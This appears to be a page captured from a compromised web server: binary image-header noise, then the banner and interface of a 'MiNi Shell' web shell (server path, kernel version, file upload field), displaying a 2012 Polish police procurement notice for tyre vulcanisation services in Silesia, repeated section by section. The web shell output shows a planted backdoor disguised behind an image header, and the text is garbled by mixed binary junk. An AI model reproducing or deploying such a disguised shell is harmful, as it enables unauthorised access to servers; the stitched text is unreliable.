JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121017/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121017/220939-N-2012.html

<p class="kh_header"><b>Katowice: Usługa wulkanizacji opon w pojazdach służbowych jednostek Policji województwa śląskiego</b><br>
<b>Numer ogłoszenia: 220939 - 2012; data zamieszczenia: 17.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Komenda Wojewódzka Policji w Katowicach , ul. J. Lompy 19, 40-038 Katowice, woj. śląskie, tel. 032 2002050, faks 032 2002060.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.katowice.kwp.policja.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa wulkanizacji opon w pojazdach służbowych jednostek Policji województwa śląskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Usługa wulkanizacji opon w pojazdach służbowych jednostek Policji województwa śląskiego
1. Przedmiotem zamówienia jest usługa wulkanizacji opon w pojazdach służbowych jednostek Policji województwa śląskiego w podziale na 14 n/w zadań:
Zadanie 1 -  Świadczenie usługi wulkanizacji opon w pojazdach służbowych dla KMP Bytom
Zadanie 2 - Świadczenie usługi wulkanizacji opon w pojazdach służbowych dla KPP Cieszyn
Zadanie 3 -  Świadczenie usługi wulkanizacji opon w pojazdach służbowych dla KMP Jastrzębie Zdrój
Zadanie 4 - Świadczenie usługi wulkanizacji opon w pojazdach służbowych dla KMP Jaworzno
Zadanie 5 - Świadczenie usługi wulkanizacji opon w pojazdach służbowych dla KMP Ruda Śląska
Zadanie 6 -  Świadczenie usługi wulkanizacji opon w pojazdach służbowych dla KMP Rybnik
Zadanie 7 - Świadczenie usługi wulkanizacji opon w pojazdach służbowych dla KMP Siemianowice Śląskie
Zadanie 8 - Świadczenie usługi wulkanizacji opon w pojazdach służbowych dla KMP KPP Tarnowskie Góry
Zadanie 9 - Świadczenie usługi wulkanizacji opon w pojazdach służbowych dla KPP Wodzisław Śląski
Zadanie 10 - Świadczenie usługi wulkanizacji opon w pojazdach służbowych dla KPP Zawiercie
Zadanie 11 - Świadczenie usługi wulkanizacji opon w pojazdach służbowych dla KPP Żywiec
Zadanie 12 - Świadczenie usługi wulkanizacji opon w pojazdach służbowych dla KMP Gliwice
Zadanie 13 - Świadczenie usługi wulkanizacji opon w pojazdach służbowych dla KMP Piekary Śląskie
Zadanie 14 - Świadczenie usługi wulkanizacji opon w pojazdach służbowych dla KMP Dąbrowa Górnicza
2.Przedmiot zamówienia obejmuje serwis opon w pojazdach służbowych o dmc do 3,5 tony, w tym pojazdów osobowych i typu furgon, będących na stanie jednostek Policji garnizonu śląskiego. Zakres serwisu opon obejmuje: wymianę opon z zimowych na letnie, z letnich na zimowe oraz naprawy wulkanizacyjne. Ilość pojazdów w trakcie trwania umowy może ulec zmianie. Wykonawca musi posiadać punkt usługowy z zapleczem technicznym umożliwiającym wykonanie w całości przedmiotu zamówienia w odległości nie przekraczającej 10 km licząc po trasie od siedziby danej jednostki Policji (wykaz jednostek wraz z adresami stanowi załącznik nr 3 do SIWZ). Punkt ten musi być czynny minimum 8 godzin dziennie od poniedziałku do piątku oraz minimum 4 godziny w sobotę. Wykonawca winien posiadać prawo własności lub inny tytuł prawny bądź przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego rozumianego jako dysponowanie punktem usługowym spełniającym ww wymogi.
Rozliczanie następować będzie na podstawie faktycznie zrealizowanych świadczeń według cen jednostkowych obliczonych zgodnie z załącznikiem nr 1 do SIWZ do wyczerpania całkowitej wartości zamówienia jaką Zamawiający przeznaczył na sfinansowanie zamówienia podaną na otwarciu ofert.
Zamawiający dopuszcza podwykonawców.
3. W przypadku wykonywania zamówienia z udziałem podwykonawców, Wykonawca zobowiązany jest złożyć oświadczenie na formularzu ofertowym  wskazując jakie części zamówienia zostaną przekazane do wykonania podwykonawcom. W przypadku niezłożenia oświadczenia Zamawiający uzna, że Wykonawca wykona zamówienia bez udziału podwykonawców.  
4. W przypadku wykonawców ubiegających się wspólnie (np. konsorcjum) o udzielenie zamówienia publicznego niezbędnym jest wskazanie w umowie konsorcjum, zakres przedmiotu zamówienia (rzeczowy) jaki będzie realizował każdy z uczestników konsorcjum. 
UWAGA:  maksymalna wartość umowy będzie opiewać na kwotę jaką Zamawiający zamierza przeznaczyć na sfinansowanie zamówienia podaną na otwarciu ofert. Cenę brutto obliczoną wg pkt X SIWZ należy podać w celu wyboru najkorzystniejszej oferty..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 50.11.65.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 14.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. W przypadku Wykonawców ubiegających się wspólnie (np. konsorcjum) o udzielenie zamówienia publicznego niezbędnym jest wskazanie w ofercie w formie oświadczenia, jaki zakres rzeczowy przedmiotu zamówienia będzie realizował każdy z uczestników konsorcjum
2. Oświadczenie wykonawcy złożone na formularzu ofertowym (zał. nr 1 do SIWZ), że:
posiada punkt usługowy z zapleczem technicznym umożliwiającym wykonanie w całości przedmiotu zamówienia, czynny minimum 8 godzin dziennie od poniedziałku do piątku oraz minimum 4 godziny w sobotę,
ww punkt usługowy znajduje się w odległości nie przekraczającej 10 km licząc po trasie od siedziby jednostki Policji, na którą składa ofertę
posiada prawo własności lub inny tytuł prawny bądź przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego rozumianego jako dysponowanie punktem usługowym spełniającym w/w wymogi</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Postanowienia dotyczące realizacji zamówienia są zawarte w  załączniku nr 3 do SIWZ - projekt umowy.
2. Jednocześnie w myśl art. 144 ust. 1 Zamawiający dopuszcza możliwość następujących zmian postanowień umowy:
Zmiana obowiązującej stawki VAT z zachowaniem kwoty brutto.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.katowice.kwp.policja.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Komenda Wojewódzka Policji Zespół Zamówień Publicznych 40-038 Katowice ul. J.Lompy 19 pokój 735.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.10.2012 godzina 10:00, miejsce: Komenda Wojewódzka Policji Zespół Zamówień Publicznych 40-038 Katowice ul. J.Lompy 19 pokój 735.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Świadczenie usługi wulkanizacji opon w pojazdach służbowych dla KMP Bytom.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje serwis opon w pojazdach służbowych o dmc do 3,5 tony, w tym pojazdów osobowych i typu furgon, będących na stanie jednostek Policji garnizonu śląskiego. Zakres serwisu opon obejmuje: wymianę opon z zimowych na letnie, z letnich na zimowe oraz naprawy wulkanizacyjne. Ilość pojazdów w trakcie trwania umowy może ulec zmianie. Wykonawca musi posiadać punkt usługowy z zapleczem technicznym umożliwiającym wykonanie w całości przedmiotu zamówienia w odległości nie przekraczającej 10 km licząc po trasie od siedziby danej jednostki Policji (wykaz jednostek wraz z adresami stanowi załącznik nr 3 do SIWZ). Punkt ten musi być czynny minimum 8 godzin dziennie od poniedziałku do piątku oraz minimum 4 godziny w sobotę. Wykonawca winien posiadać prawo własności lub inny tytuł prawny bądź przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego rozumianego jako dysponowanie punktem usługowym spełniającym w/w wymogi.
Rozliczanie następować będzie na podstawie faktycznie zrealizowanych świadczeń według cen jednostkowych obliczonych zgodnie z załącznikiem nr 1 do SIWZ do wyczerpania całkowitej wartości zamówienia jaką Zamawiający przeznaczył na sfinansowanie zamówienia podaną na otwarciu ofert.
Zamawiający dopuszcza podwykonawców.
3. W przypadku wykonywania zamówienia z udziałem podwykonawców, Wykonawca zobowiązany jest złożyć oświadczenie na formularzu ofertowym  wskazując jakie części zamówienia zostaną przekazane do wykonania podwykonawcom. W przypadku niezłożenia oświadczenia Zamawiający uzna, że Wykonawca wykona zamówienia bez udziału podwykonawców.  
4. W przypadku wykonawców ubiegających się wspólnie (np. konsorcjum) o udzielenie zamówienia publicznego niezbędnym jest wskazanie w umowie konsorcjum, zakres przedmiotu zamówienia (rzeczowy) jaki będzie realizował każdy z uczestników konsorcjum. 
UWAGA:  maksymalna wartość umowy będzie opiewać na kwotę jaką Zamawiający zamierza przeznaczyć na sfinansowanie zamówienia podaną na otwarciu ofert. Cenę brutto obliczoną wg pkt X SIWZ należy podać w celu wyboru najkorzystniejszej oferty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.65.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Świadczenie usługi wulkanizacji opon w pojazdach służbowych dla KPP Cieszyn.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje serwis opon w pojazdach służbowych o dmc do 3,5 tony, w tym pojazdów osobowych i typu furgon, będących na stanie jednostek Policji garnizonu śląskiego. Zakres serwisu opon obejmuje: wymianę opon z zimowych na letnie, z letnich na zimowe oraz naprawy wulkanizacyjne. Ilość pojazdów w trakcie trwania umowy może ulec zmianie. Wykonawca musi posiadać punkt usługowy z zapleczem technicznym umożliwiającym wykonanie w całości przedmiotu zamówienia w odległości nie przekraczającej 10 km licząc po trasie od siedziby danej jednostki Policji (wykaz jednostek wraz z adresami stanowi załącznik nr 3 do SIWZ). Punkt ten musi być czynny minimum 8 godzin dziennie od poniedziałku do piątku oraz minimum 4 godziny w sobotę. Wykonawca winien posiadać prawo własności lub inny tytuł prawny bądź przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego rozumianego jako dysponowanie punktem usługowym spełniającym w/w wymogi.
Rozliczanie następować będzie na podstawie faktycznie zrealizowanych świadczeń według cen jednostkowych obliczonych zgodnie z załącznikiem nr 1 do SIWZ do wyczerpania całkowitej wartości zamówienia jaką Zamawiający przeznaczył na sfinansowanie zamówienia podaną na otwarciu ofert.
Zamawiający dopuszcza podwykonawców.
3. W przypadku wykonywania zamówienia z udziałem podwykonawców, Wykonawca zobowiązany jest złożyć oświadczenie na formularzu ofertowym  wskazując jakie części zamówienia zostaną przekazane do wykonania podwykonawcom. W przypadku niezłożenia oświadczenia Zamawiający uzna, że Wykonawca wykona zamówienia bez udziału podwykonawców.  
4. W przypadku wykonawców ubiegających się wspólnie (np. konsorcjum) o udzielenie zamówienia publicznego niezbędnym jest wskazanie w umowie konsorcjum, zakres przedmiotu zamówienia (rzeczowy) jaki będzie realizował każdy z uczestników konsorcjum. 
UWAGA:  maksymalna wartość umowy będzie opiewać na kwotę jaką Zamawiający zamierza przeznaczyć na sfinansowanie zamówienia podaną na otwarciu ofert. Cenę brutto obliczoną wg pkt X SIWZ należy podać w celu wyboru najkorzystniejszej oferty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.65.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Świadczenie usługi wulkanizacji opon w pojazdach służbowych dla KMP Jastrzębie Zdrój.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje serwis opon w pojazdach służbowych o dmc do 3,5 tony, w tym pojazdów osobowych i typu furgon, będących na stanie jednostek Policji garnizonu śląskiego. Zakres serwisu opon obejmuje: wymianę opon z zimowych na letnie, z letnich na zimowe oraz naprawy wulkanizacyjne. Ilość pojazdów w trakcie trwania umowy może ulec zmianie. Wykonawca musi posiadać punkt usługowy z zapleczem technicznym umożliwiającym wykonanie w całości przedmiotu zamówienia w odległości nie przekraczającej 10 km licząc po trasie od siedziby danej jednostki Policji (wykaz jednostek wraz z adresami stanowi załącznik nr 3 do SIWZ). Punkt ten musi być czynny minimum 8 godzin dziennie od poniedziałku do piątku oraz minimum 4 godziny w sobotę. Wykonawca winien posiadać prawo własności lub inny tytuł prawny bądź przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego rozumianego jako dysponowanie punktem usługowym spełniającym w/w wymogi.
Rozliczanie następować będzie na podstawie faktycznie zrealizowanych świadczeń według cen jednostkowych obliczonych zgodnie z załącznikiem nr 1 do SIWZ do wyczerpania całkowitej wartości zamówienia jaką Zamawiający przeznaczył na sfinansowanie zamówienia podaną na otwarciu ofert.
Zamawiający dopuszcza podwykonawców.
3. W przypadku wykonywania zamówienia z udziałem podwykonawców, Wykonawca zobowiązany jest złożyć oświadczenie na formularzu ofertowym  wskazując jakie części zamówienia zostaną przekazane do wykonania podwykonawcom. W przypadku niezłożenia oświadczenia Zamawiający uzna, że Wykonawca wykona zamówienia bez udziału podwykonawców.  
4. W przypadku wykonawców ubiegających się wspólnie (np. konsorcjum) o udzielenie zamówienia publicznego niezbędnym jest wskazanie w umowie konsorcjum, zakres przedmiotu zamówienia (rzeczowy) jaki będzie realizował każdy z uczestników konsorcjum. 
UWAGA:  maksymalna wartość umowy będzie opiewać na kwotę jaką Zamawiający zamierza przeznaczyć na sfinansowanie zamówienia podaną na otwarciu ofert. Cenę brutto obliczoną wg pkt X SIWZ należy podać w celu wyboru najkorzystniejszej oferty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.65.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Świadczenie usługi wulkanizacji opon w pojazdach służbowych dla KMP Jaworzno.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje serwis opon w pojazdach służbowych o dmc do 3,5 tony, w tym pojazdów osobowych i typu furgon, będących na stanie jednostek Policji garnizonu śląskiego. Zakres serwisu opon obejmuje: wymianę opon z zimowych na letnie, z letnich na zimowe oraz naprawy wulkanizacyjne. Ilość pojazdów w trakcie trwania umowy może ulec zmianie. Wykonawca musi posiadać punkt usługowy z zapleczem technicznym umożliwiającym wykonanie w całości przedmiotu zamówienia w odległości nie przekraczającej 10 km licząc po trasie od siedziby danej jednostki Policji (wykaz jednostek wraz z adresami stanowi załącznik nr 3 do SIWZ). Punkt ten musi być czynny minimum 8 godzin dziennie od poniedziałku do piątku oraz minimum 4 godziny w sobotę. Wykonawca winien posiadać prawo własności lub inny tytuł prawny bądź przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego rozumianego jako dysponowanie punktem usługowym spełniającym w/w wymogi.
Rozliczanie następować będzie na podstawie faktycznie zrealizowanych świadczeń według cen jednostkowych obliczonych zgodnie z załącznikiem nr 1 do SIWZ do wyczerpania całkowitej wartości zamówienia jaką Zamawiający przeznaczył na sfinansowanie zamówienia podaną na otwarciu ofert.
Zamawiający dopuszcza podwykonawców.
3. W przypadku wykonywania zamówienia z udziałem podwykonawców, Wykonawca zobowiązany jest złożyć oświadczenie na formularzu ofertowym  wskazując jakie części zamówienia zostaną przekazane do wykonania podwykonawcom. W przypadku niezłożenia oświadczenia Zamawiający uzna, że Wykonawca wykona zamówienia bez udziału podwykonawców.  
4. W przypadku wykonawców ubiegających się wspólnie (np. konsorcjum) o udzielenie zamówienia publicznego niezbędnym jest wskazanie w umowie konsorcjum, zakres przedmiotu zamówienia (rzeczowy) jaki będzie realizował każdy z uczestników konsorcjum. 
UWAGA:  maksymalna wartość umowy będzie opiewać na kwotę jaką Zamawiający zamierza przeznaczyć na sfinansowanie zamówienia podaną na otwarciu ofert. Cenę brutto obliczoną wg pkt X SIWZ należy podać w celu wyboru najkorzystniejszej oferty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.65.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Świadczenie usługi wulkanizacji opon w pojazdach służbowych dla KMP Ruda Śląska.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje serwis opon w pojazdach służbowych o dmc do 3,5 tony, w tym pojazdów osobowych i typu furgon, będących na stanie jednostek Policji garnizonu śląskiego. Zakres serwisu opon obejmuje: wymianę opon z zimowych na letnie, z letnich na zimowe oraz naprawy wulkanizacyjne. Ilość pojazdów w trakcie trwania umowy może ulec zmianie. Wykonawca musi posiadać punkt usługowy z zapleczem technicznym umożliwiającym wykonanie w całości przedmiotu zamówienia w odległości nie przekraczającej 10 km licząc po trasie od siedziby danej jednostki Policji (wykaz jednostek wraz z adresami stanowi załącznik nr 3 do SIWZ). Punkt ten musi być czynny minimum 8 godzin dziennie od poniedziałku do piątku oraz minimum 4 godziny w sobotę. Wykonawca winien posiadać prawo własności lub inny tytuł prawny bądź przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego rozumianego jako dysponowanie punktem usługowym spełniającym w/w wymogi.
Rozliczanie następować będzie na podstawie faktycznie zrealizowanych świadczeń według cen jednostkowych obliczonych zgodnie z załącznikiem nr 1 do SIWZ do wyczerpania całkowitej wartości zamówienia jaką Zamawiający przeznaczył na sfinansowanie zamówienia podaną na otwarciu ofert.
Zamawiający dopuszcza podwykonawców.
3. W przypadku wykonywania zamówienia z udziałem podwykonawców, Wykonawca zobowiązany jest złożyć oświadczenie na formularzu ofertowym  wskazując jakie części zamówienia zostaną przekazane do wykonania podwykonawcom. W przypadku niezłożenia oświadczenia Zamawiający uzna, że Wykonawca wykona zamówienia bez udziału podwykonawców.  
4. W przypadku wykonawców ubiegających się wspólnie (np. konsorcjum) o udzielenie zamówienia publicznego niezbędnym jest wskazanie w umowie konsorcjum, zakres przedmiotu zamówienia (rzeczowy) jaki będzie realizował każdy z uczestników konsorcjum. 
UWAGA:  maksymalna wartość umowy będzie opiewać na kwotę jaką Zamawiający zamierza przeznaczyć na sfinansowanie zamówienia podaną na otwarciu ofert. Cenę brutto obliczoną wg pkt X SIWZ należy podać w celu wyboru najkorzystniejszej oferty..</p></li>
